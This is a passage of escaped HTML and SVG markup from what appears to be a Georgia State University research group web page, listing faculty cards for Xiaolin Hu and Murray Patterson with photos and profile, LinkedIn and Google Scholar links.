xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div 